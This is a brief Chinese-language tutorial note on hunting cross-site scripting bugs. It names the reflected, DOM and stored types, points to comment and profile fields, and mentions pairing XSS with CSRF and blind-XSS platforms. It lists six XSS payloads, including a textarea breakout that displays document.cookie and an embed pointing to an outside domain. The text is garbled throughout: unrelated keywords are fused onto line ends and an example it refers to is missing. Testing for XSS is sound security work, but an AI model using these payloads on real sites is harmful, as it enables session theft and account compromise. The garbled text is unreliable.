漏洞挖掘之xss

xss(跨站腳本)cookie

分類:1.反射型xssxss

   2.DOM型xsssvg

     3.存儲型xssspa

 

這是某次挖的xsscsrf

 

 

存儲型xss可能出如今評論處,用戶我的信息處等blog

 

 

部分xsspaload:ip

"><script>alert(1)</script>//
<img src=x onerror=alert(2)>
<svg /onload=alert`1`>
<embed src=//tiny.cc>
</textarea><script>alert(document.cookie)</script><textarea>
</span><img src=x onerror=alert(1)><span>反射

 

一切存在輸入的地方皆可能存在xss,注意xss不單單是彈框im

利用:xss+csrf error

   盲打平臺

   ...

相關文章
相關標籤/搜索